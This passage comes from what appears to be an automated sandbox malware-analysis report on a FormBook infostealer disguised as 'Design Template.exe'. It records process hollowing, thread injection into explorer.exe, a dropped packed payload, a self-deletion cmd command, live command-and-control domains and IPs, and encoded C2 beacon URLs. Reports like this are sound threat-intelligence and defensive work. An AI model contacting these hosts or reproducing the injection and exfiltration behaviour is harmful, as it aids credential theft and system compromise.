        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454EA55 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04514257 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04489240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04489240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04489240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04489240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0453B260 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0453B260 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C927A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04558A62 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454AA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454AA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04498A0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A3A1C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04485210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04485210 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04485210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04485210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448AA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448AA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C4A2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C4A2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00424EAA SetUnhandledExceptionFilter,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00424EBC SetUnhandledExceptionFilter,

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        System process connects to network (likely due to code injection or exploit)Show sources
        Source: C:\Windows\explorer.exeNetwork Connect: 198.50.252.64 80
        Source: C:\Windows\explorer.exeDomain query: www.gxjljc.com
        Source: C:\Windows\explorer.exeDomain query: www.betralifcannabis.com
        Source: C:\Windows\explorer.exeNetwork Connect: 160.153.136.3 80
        Source: C:\Windows\explorer.exeDomain query: www.modomo.amsterdam
        Source: C:\Windows\explorer.exeDomain query: www.bestflowersandgifts.com
        Source: C:\Windows\explorer.exeNetwork Connect: 47.105.113.141 80
        Source: C:\Windows\explorer.exeDomain query: www.2elden.com
        Source: C:\Windows\explorer.exeNetwork Connect: 14.215.190.65 80
        Source: C:\Windows\explorer.exeDomain query: www.zq2003.com
        Source: C:\Windows\explorer.exeDomain query: www.landreclaim.com
        Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
        Source: C:\Windows\explorer.exeDomain query: www.rememberingedward.info
        Source: C:\Windows\explorer.exeNetwork Connect: 156.226.160.56 80
        Source: C:\Windows\explorer.exeDomain query: www.chuanyangwenhua.com
        Maps a DLL or memory area into another processShow sources
        Source: C:\Users\user\Desktop\Design Template.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\Design Template.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\Design Template.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
        Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Modifies the context of a thread in another process (thread injection)Show sources
        Source: C:\Users\user\Desktop\Design Template.exeThread register set: target process: 3292
        Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 3292
        Queues an APC in another process (thread injection)Show sources
        Source: C:\Users\user\Desktop\Design Template.exeThread APC queued: target process: C:\Windows\explorer.exe
        Sample uses process hollowing techniqueShow sources
        Source: C:\Users\user\Desktop\Design Template.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 1030000
        Source: C:\Users\user\Desktop\Design Template.exeProcess created: C:\Users\user\Desktop\Design Template.exe C:\Users\user\Desktop\Design Template.exe
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Design Template.exe'
        Source: explorer.exe, 00000007.00000002.504496251.0000000001400000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.505387149.0000000003050000.00000002.00000001.sdmpBinary or memory string: uProgram Manager
        Source: explorer.exe, 00000007.00000002.504496251.0000000001400000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.505387149.0000000003050000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
        Source: explorer.exe, 00000007.00000002.504496251.0000000001400000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.505387149.0000000003050000.00000002.00000001.sdmpBinary or memory string: Progman
        Source: explorer.exe, 00000007.00000002.504496251.0000000001400000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.505387149.0000000003050000.00000002.00000001.sdmpBinary or memory string: Progmanlock
        Source: explorer.exe, 00000007.00000002.502832403.0000000000EB8000.00000004.00000020.sdmpBinary or memory string: ProgmanX
        Source: explorer.exe, 00000007.00000000.303083961.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndAj
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00431B5C GetVersion,GetProcessVersion,LoadCursorA,LoadCursorA,LoadCursorA,

        Stealing of Sensitive Information:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPED

        Remote Access Functionality:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPED

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsNative API1Path InterceptionProcess Injection512Masquerading1Input Capture1Security Software Discovery121Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information4LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonRundll321Cached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 385453 Sample: Design Template.exe Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 36 yashasvsaluja.com 2->36 38 www.yashasvsaluja.com 2->38 40 7 other IPs or domains 2->40 44 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->44 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 9 other signatures 2->50 11 Design Template.exe 1 2->11         started        signatures3 process4 file5 28 C:\Users\user\AppData\Local\...\Liebert.bmp, PE32 11->28 dropped 14 Design Template.exe 11->14         started        process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Sample uses process hollowing technique 14->62 64 Queues an APC in another process (thread injection) 14->64 17 explorer.exe 14->17 injected process8 dnsIp9 30 www.2elden.com 156.226.160.56, 49724, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 17->30 32 www.landreclaim.com 198.50.252.64, 49725, 80 OVHFR Canada 17->32 34 13 other IPs or domains 17->34 42 System process connects to network (likely due to code injection or exploit) 17->42 21 rundll32.exe 17->21         started        signatures10 process11 signatures12 52 Modifies the context of a thread in another process (thread injection) 21->52 54 Maps a DLL or memory area into another process 21->54 56 Tries to detect virtualization through RDTSC time measurements 21->56 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        Design Template.exe35%VirustotalBrowse
        Design Template.exe100%AviraHEUR/AGEN.1106037
        Design Template.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\Liebert.bmp100%AviraTR/Crypt.ZPACK.Gen
        C:\Users\user\AppData\Local\Temp\Liebert.bmp100%Joe Sandbox ML

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        2.1.Design Template.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        4.1.Design Template.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        14.2.rundll32.exe.7b4cd8.1.unpack100%AviraTR/Patched.GenDownload File
        2.2.Design Template.exe.400000.0.unpack100%AviraHEUR/AGEN.1106037Download File
        2.0.Design Template.exe.400000.0.unpack100%AviraHEUR/AGEN.1106037Download File
        14.2.rundll32.exe.4997960.5.unpack100%AviraTR/Patched.GenDownload File
        4.0.Design Template.exe.400000.0.unpack100%AviraHEUR/AGEN.1106037Download File

        Domains

        SourceDetectionScannerLabelLink
        gz01.bch.baidu-itm.com2%VirustotalBrowse
        bestflowersandgifts.com0%VirustotalBrowse
        www.realunitystudio.com0%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://schemas.mi0%URL Reputationsafe
        http://schemas.mi0%URL Reputationsafe
        http://schemas.mi0%URL Reputationsafe
        http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
        http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
        http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
        http://www.zq2003.com/ma3c/?_h0PX=Gz+aoBPIJMIekXk3JsVdGsrVgmXfAgzKyy9hyMbSTriZHiVLNZmhNLWpckAwWma5tVpoOvHwTA==&nflpdH=xVJtBJipx0%Avira URL Cloudsafe
        http://www.tiro.com0%URL Reputationsafe
        http://www.tiro.com0%URL Reputationsafe
        http://www.tiro.com0%URL Reputationsafe
        http://www.goodfont.co.kr0%URL Reputationsafe
        http://www.goodfont.co.kr0%URL Reputationsafe
        http://www.goodfont.co.kr0%URL Reputationsafe
        http://schemas.micr0%URL Reputationsafe
        http://schemas.micr0%URL Reputationsafe
        http://schemas.micr0%URL Reputationsafe
        http://www.rememberingedward.info/ma3c/?nflpdH=xVJtBJipx&_h0PX=RuFpatm7w3m/GHk8xUv8fbdHxofOzIP3Dox3D+RGa/EJfN2FdDJ31PqXCKFVKmmG9jkHvetkoA==0%Avira URL Cloudsafe
        http://www.bestflowersandgifts.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=IYnhIGwcQmbdxEO5DsUkvq5x/f/PoDEr3kEuTATZH4q1+Xg6K+Y8FVJqSC6GxdnWJvbcnap46w==0%Avira URL Cloudsafe
        http://www.sexichef.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=zjRNxAcCRCg7Q4faxm7O9/wlBfqcu26Ht8wCsETVdMApM4UO++TRNwkGPLPsxzY/h5O+ZiCdmw==0%Avira URL Cloudsafe
        http://www.carterandcone.coml0%URL Reputationsafe
        http://www.carterandcone.coml0%URL Reputationsafe
        http://www.carterandcone.coml0%URL Reputationsafe
        http://www.sajatypeworks.com0%URL Reputationsafe
        http://www.sajatypeworks.com0%URL Reputationsafe
        http://www.sajatypeworks.com0%URL Reputationsafe
        http://www.typography.netD0%URL Reputationsafe
        http://www.typography.netD0%URL Reputationsafe
        http://www.typography.netD0%URL Reputationsafe
        http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
        http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
        http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
        http://www.landreclaim.com/ma3c/?_h0PX=7OYBgr9QTbWzQEqxE5F2WSPs+5f12FdEeOVATof0xMsEqgRBEzo+rxwtbbYEgcdUMYm0l9yvIw==&nflpdH=xVJtBJipx0%Avira URL Cloudsafe
        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
        http://fontfabrik.com0%URL Reputationsafe
        http://fontfabrik.com0%URL Reputationsafe
        http://fontfabrik.com0%URL Reputationsafe
        http://www.founder.com.cn/cn0%URL Reputationsafe
        http://www.founder.com.cn/cn0%URL Reputationsafe
        http://www.founder.com.cn/cn0%URL Reputationsafe
        www.zq2003.com/ma3c/0%Avira URL Cloudsafe
        http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
        http://www.sci-mfg.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=6w2wX9052gwDzHc+6ODPhIZFPdBQiC5v+fUP1qbbipTXUM2PhMECBJTSXWpwe4MsJEjxMxxOZQ==0%Avira URL Cloudsafe
        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
        http://www.betralifcannabis.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=Va4Ksj86yCgOFLNPhm+pHKG99OfqBZ9kfeFppHGmoUJffb1lK9bId45lnDO36EhwcfHg23q4hQ==0%Avira URL Cloudsafe
        http://www.sandoll.co.kr0%URL Reputationsafe
        http://www.sandoll.co.kr0%URL Reputationsafe
        http://www.sandoll.co.kr0%URL Reputationsafe
        http://www.chuanyangwenhua.com/ma3c/?_h0PX=2MgTmInwKAFXORySzOhWikkJNLfSb5eys+c5OewZSV9pJ7GqMjdkEgpEBVTJsJvFnWJ8QAWSFg==&nflpdH=xVJtBJipx0%Avira URL Cloudsafe
        http://www.urwpp.deDPlease0%URL Reputationsafe
        http://www.urwpp.deDPlease0%URL Reputationsafe
        http://www.urwpp.deDPlease0%URL Reputationsafe
        http://www.zhongyicts.com.cn0%URL Reputationsafe
        http://www.zhongyicts.com.cn0%URL Reputationsafe
        http://www.zhongyicts.com.cn0%URL Reputationsafe
        http://www.2elden.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=dtjU+FMvo+K0Hy2rJYJ4DlSiBEZivW2cseEeC9QykUoFZ//bqj3e3OnwJH2q0JCt3Y48Pt7erw==0%Avira URL Cloudsafe
        http://www.sakkal.com0%URL Reputationsafe
        http://www.sakkal.com0%URL Reputationsafe
        http://www.sakkal.com0%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        gz01.bch.baidu-itm.com
        14.215.190.65
        truetrueunknown
        yashasvsaluja.com
        192.0.78.25
        truetrue
          unknown
          bestflowersandgifts.com
          34.102.136.180
          truefalseunknown
          www.realunitystudio.com
          204.11.56.48
          truetrueunknown
          www.zq2003.com
          47.105.113.141
          truetrue
            unknown
            rememberingedward.info
            160.153.136.3
            truetrue
              unknown
              www.landreclaim.com
              198.50.252.64
              truetrue
                unknown
                sexichef.com
                34.102.136.180
                truefalse
                  unknown
                  sci-mfg.com
                  34.102.136.180
                  truefalse
                    unknown
                    betralifcannabis.com
                    34.102.136.180
                    truefalse
                      unknown
                      www.2elden.com
                      156.226.160.56
                      truetrue
                        unknown
                        www.gxjljc.com
                        unknown
                        unknowntrue
                          unknown
                          www.betralifcannabis.com
                          unknown
                          unknowntrue
                            unknown
                            www.mirgran.com
                            unknown
                            unknowntrue
                              unknown
                              www.modomo.amsterdam
                              unknown
                              unknowntrue
                                unknown
                                www.bestflowersandgifts.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.sexichef.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.yashasvsaluja.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.rememberingedward.info
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.sci-mfg.com
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.chuanyangwenhua.com
                                          unknown
                                          unknowntrue
                                            unknown

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            http://www.zq2003.com/ma3c/?_h0PX=Gz+aoBPIJMIekXk3JsVdGsrVgmXfAgzKyy9hyMbSTriZHiVLNZmhNLWpckAwWma5tVpoOvHwTA==&nflpdH=xVJtBJipxtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.rememberingedward.info/ma3c/?nflpdH=xVJtBJipx&_h0PX=RuFpatm7w3m/GHk8xUv8fbdHxofOzIP3Dox3D+RGa/EJfN2FdDJ31PqXCKFVKmmG9jkHvetkoA==true
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.bestflowersandgifts.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=IYnhIGwcQmbdxEO5DsUkvq5x/f/PoDEr3kEuTATZH4q1+Xg6K+Y8FVJqSC6GxdnWJvbcnap46w==false
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.sexichef.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=zjRNxAcCRCg7Q4faxm7O9/wlBfqcu26Ht8wCsETVdMApM4UO++TRNwkGPLPsxzY/h5O+ZiCdmw==false
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.landreclaim.com/ma3c/?_h0PX=7OYBgr9QTbWzQEqxE5F2WSPs+5f12FdEeOVATof0xMsEqgRBEzo+rxwtbbYEgcdUMYm0l9yvIw==&nflpdH=xVJtBJipxtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            www.zq2003.com/ma3c/true
                                            • Avira URL Cloud: safe
                                            low
                                            http://www.sci-mfg.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=6w2wX9052gwDzHc+6ODPhIZFPdBQiC5v+fUP1qbbipTXUM2PhMECBJTSXWpwe4MsJEjxMxxOZQ==false
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.betralifcannabis.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=Va4Ksj86yCgOFLNPhm+pHKG99OfqBZ9kfeFppHGmoUJffb1lK9bId45lnDO36EhwcfHg23q4hQ==false
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.chuanyangwenhua.com/ma3c/?_h0PX=2MgTmInwKAFXORySzOhWikkJNLfSb5eys+c5OewZSV9pJ7GqMjdkEgpEBVTJsJvFnWJ8QAWSFg==&nflpdH=xVJtBJipxtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.2elden.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=dtjU+FMvo+K0Hy2rJYJ4DlSiBEZivW2cseEeC9QykUoFZ//bqj3e3OnwJH2q0JCt3Y48Pt7erw==true
                                            • Avira URL Cloud: safe
                                            unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000007.00000000.298632353.0000000006870000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.fontbureau.comexplorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.fontbureau.com/designersGexplorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://schemas.miexplorer.exe, 00000007.00000000.308827375.000000000ECFB000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers/?explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                      high
                                                      https://twitter.com/onlydomainsrundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.founder.com.cn/cn/bTheexplorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.cssrundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://www.fontbureau.com/designers?explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                            high
                                                            https://www.onlydomains.com/hosting/?utm_medium=free_parking&utm_source=landreclaim.comrundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://www.tiro.comexplorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://www.onlydomains.com?utm_medium=free_parking&utm_source=landreclaim.comrundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://www.fontbureau.com/designersexplorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                                  high
                                                                  http://www.goodfont.co.krexplorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://schemas.micrexplorer.exe, 00000007.00000000.308827375.000000000ECFB000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.carterandcone.comlexplorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.sajatypeworks.comexplorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.typography.netDexplorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                                    high
                                                                    http://www.founder.com.cn/cn/cTheexplorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://fontfabrik.comexplorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.founder.com.cn/cnexplorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.cssrundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                                        high
                                                                        https://www.trustpilot.com/review/onlydomains.comrundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          http://www.jiyu-kobo.co.jp/explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.fontbureau.com/designers8explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                                            high
                                                                            http://www.fonts.comexplorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                                              high
                                                                              http://www.sandoll.co.krexplorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.urwpp.deDPleaseexplorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.zhongyicts.com.cnexplorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.sakkal.comexplorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
